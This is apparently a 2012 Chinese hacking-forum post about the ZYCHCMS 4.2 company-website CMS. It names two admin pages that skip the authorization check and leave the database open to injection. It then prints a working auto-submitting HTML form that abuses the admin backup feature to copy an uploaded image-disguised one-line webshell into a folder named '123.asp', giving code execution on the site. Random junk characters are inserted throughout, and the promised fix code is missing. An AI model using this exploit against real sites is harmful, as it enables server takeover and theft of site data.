找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1759|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
' [* w! Z( k% t! r- I$ o/ G0 J4 i$ O0 Y
) J! E/ I0 s; ?: Z# Q, l. _; \' b
" \9 r) Z* C1 v7 {0 B  x

+ ?! H' A$ L7 i( u$ y  h4 V* ~5 q影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
1 s  U0 K( W9 G% j; y ①SQL注射漏洞
8 }! C: N- m, p& j 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp! h% C2 p5 R; p( z2 E
漏洞原因:未过滤
" ^3 r& y; X- J4 V 漏洞代码:; b- d7 [6 R7 v# {% \0 ]7 |
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。! F2 r& h+ I. k" B: a: f5 Z
修复方法:在文件开头加入代码
1 V& |/ ], T/ w! b& m, z8 T5 v 7 n6 }0 P& ]9 r. n; ^2 M# k4 P

' x' O/ t# J/ q8 ^②后台拿WBSHELL
3 x  J2 F7 r$ b; {6 J 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。" E* c& v2 l/ {8 R, }
这里在网上找了一个,改了下,将就着用。
. E9 S2 d* q! M* E. v6 }6 R9 ` 以下是代码本地提交代码
% o8 v7 U) ~- T. K7 Q( A/ x
! \, A5 v( y/ w( A( O4 A+ F. A1 |9 S& I7 {; D
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>1 ]; `2 d- l) r- K8 r; T, q
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
- n. ]% z: Q; G0 t' s <tr>
1 @8 a- v  S* Q7 O7 L' ^, [2 T8 c <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
0 j. c! M* i8 Z" D( Q. a, [/ I </tr>
! Z0 x' n8 _' q* g, z <tr>
/ m' d$ I& ?6 G9 u; T" v" ] <td bgcolor=”#FFFFFF”><span class=”back_southidc”>
4 J! r8 _' d; p, d </span>0 d0 W& U7 m( A
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
5 y. s  l  v+ y6 j5 H) Q8 C7 ~ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >6 F$ `2 i; o8 `% }) b
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
6 U: h+ u3 g( f8 Y <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d& s; t3 e2 r, t
<div align=”left”>
9 J) e+ T4 ^; T4 w* @. D! j* _0 J <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />& |, d# `$ H6 [6 m# A) [0 [
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>- P5 N8 B7 |/ C+ x$ z
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />) t1 E1 L1 K+ W0 E7 h' f
</div></td>, l. J/ K' L  D; J, G8 H, h% v
</tr>) H7 I# J, X5 e& c) Q
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
$ }1 T" q$ g. x( `2 J/ P <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
) [" U' L) o7 d) ^2 I" O <td class=”td”><div align=”left”>) D! L  x& Z, }6 I
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
4 H0 d" i) k9 K( ?8 ^: H [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>) d6 X; p' J. y# }2 w/ A3 G- t
</tr>: I. e: f  s# i
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
) y; l1 [( u# x9 B. P <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>" h) m9 Z8 N! o
<td class=”td”><div align=”left”>
9 g/ J4 V! F  p0 I* |6 s& `( J6 q <input type=”submit” value=”确定备份” class=”btn”8 K$ s5 F4 D  F* S- ~
</div></td>
: p! t+ S2 |  t </tr>0 d' V; h  w+ p2 B( Y% k, U4 x8 C
</table></td></tr></form># |8 M, V- Y! a- ~& V! {. M
</table>. m) ?( C7 F* Z: u( x6 P
</td>
5 \; J) Z! Y2 e& S </tr>
7 E! h  u8 E+ a# ^' f3 H8 ] </table>6 R8 s  a* z9 X4 t# L  b$ \
<script>
$ g% a5 E+ Z3 E, K' Y document.all.add.submit();
! `( s# ]' n1 f* N% S </script>
& o! V% `) l( g1 o8 \
9 W- o( l" n/ O( j% H# c- B9 b) d' _  C8 Q" F, }+ }5 N$ k
6 t' P2 R* W, }1 w

7 M( Y$ P2 l4 B2 z! {2 b
+ W- w$ J# d6 i1 _( I& s$ j9 K4 Y% @9 ?! u
4 |/ V. @, b6 Y0 C" M
& d1 ~: W" r7 O

! t  n  q: N; e5 ?9 ]
  G) e" D1 [4 l1 h) T* w
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表